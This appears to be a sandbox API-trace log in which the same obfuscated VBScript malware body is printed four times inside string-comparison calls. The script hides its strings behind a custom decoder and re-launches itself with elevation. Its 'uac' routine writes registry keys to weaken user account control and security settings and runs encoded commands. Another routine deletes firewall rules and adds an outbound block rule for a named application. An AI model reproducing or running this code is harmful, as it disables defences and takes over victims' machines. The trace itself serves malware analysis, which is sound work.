bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 31 [0226.313] wcsncmp (_String1="Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 63 [0226.313] wcsncmp (_String1="en(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88 [0226.313] wcsncmp (_String1="n(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 97 [0226.313] wcsncmp (_String1="(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 27 [0226.313] wcsncmp (_String1="s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = 